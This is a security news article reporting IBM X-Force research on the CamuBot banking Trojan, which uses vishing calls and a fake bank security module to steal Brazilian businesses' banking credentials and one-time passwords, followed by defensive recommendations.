David Bisson

David Bisson is an infosec news junkie and security journalist. He works as Senior Content Manager at Bora, Associate Editor for Tripwire's "The State of Security" blog, Contributing Editor for IBM's Security Intelligence, and Contributing Writer for Palo Alto Networks' Security Roundtable, Gemalto, Venafi, Zix Corp, AlienVault, Barkly and others.

Fraudsters Using New ‘CamuBot’ Malware to Steal Brazilian Banking Business Customers’ Credentials

Fraudsters are targeting business customers of several Brazilian banks with CamuBot malware in order to steal their account credentials.

In August 2018, researchers at IBM X-Force spotted some of the first attacks leveraging CamuBot to target business banking users in Brazil.

The offensives began with the fraudsters conducting some reconnaissance to find out what businesses used a target bank or financial institution. By concentrating their efforts in Brazil, the criminals could have achieved the necessary level of research through a phone book, search engine, or a professional social network, noted IBM’s researchers.

Next, the attackers contacted employees who likely had access to their employers’ banking credentials. Posing as bank representatives, the criminals directed the employees to visit a URL in order to check if their business had the target bank’s latest security module installed. When this check came back negative, the fraudsters tricked the employees into installing CamuBot.

Limor Kessem, executive security advisor at IBM, emphasized that CamuBot stands apart from typical malware operations in Brazil. As she wrote in a blog post:

Very different from typical banking Trojans, CamuBot does not hide its deployment. On the contrary, it is very visible, using bank logos and overall brand imaging to appear like a security application. It thus gains victims’ trust and leads them to install it without realizing they are running an installation wizard for a Trojan horse.

Acknowledging this sophistication, Kessem noted that CamuBot is more advanced than other banking malware families that simply use fake overlay screens and instead resembles innovative threats like Dridex and TrickBot that combine social engineering and malware-based tactics.

Upon execution, CamuBot writes two files to the %ProgramData% Windows folder to create a Secure Shell (SSH)-based SOCKS proxy module on the device. It also modifies the firewall and antivirus rules to evade detection. The malware operators then can use the proxy module, when equipped with port forwarding, to direct their traffic through the infected machine and access the business’s bank account with the compromised device’s own IP address.

All of these preparations led to the final step of the attack: a pop-up screen that redirects the victim to a phishing landing page purporting to be the target bank’s login page. The criminals hang up once the victim has submitted their employer’s bank account credentials.

Security best practices such as multi-factor authentication can help prevent attackers from preying on businesses using their banking affiliations. But even these measures have their limits. For instance, IBM’s X-Force researchers observed that CamuBot’s operators in some cases asked the victim to enable sharing with a driver for their infected device. Doing so enabled the malware operators to retrieve one-time passwords generated for authentication purposes.

These techniques highlight the importance of organizations conducting ongoing security awareness training with their employees. This type of education should include phishing simulations so that the entire workforce can learn how to spot a suspicious email, link and/or incoming phone call.